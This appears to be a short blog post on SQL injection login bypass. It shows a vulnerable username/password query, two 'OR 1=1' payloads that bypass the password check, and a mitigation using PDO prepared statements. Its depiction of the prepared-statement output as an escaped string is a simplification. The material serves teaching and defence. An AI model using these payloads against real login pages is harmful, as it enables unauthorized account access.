API - SQL Login Page Bypass
SQL - Login Page Bypass with Logical Operator OR Condition.
Vulnerable Query:
SELECT * FROM users
WHERE username = '$username'
AND password = '$password';
Payload 1 - $password = 'a' or 1='1' => Payload === > a' or 1='1
Payload 2 - $password = 'a' or 1=1#' => Payload ====> a' or 1=1#'
SELECT * FROM users
WHERE username = 'someone'
AND password = 'a' OR 1=1#';
Mitigation:
1. Use Prepared Statements / Parameterized Queries
$username = "alice"; // Using dynamic variable
$stmt = $pdo->prepare("SELECT id, password_hash FROM users WHERE username = ?"); //Without concatenate the two values (AND).
$stmt->execute([$username]);
$row = $stmt->fetch();
Sample Payload Inject:
$username = "alice' OR 1=1 --";
Sample Output:
SELECT id, password_hash FROM users
WHERE username = 'alice\' OR 1=1 --'; //Non-execution Query & It's treated as a string and not code.
Comments
Post a Comment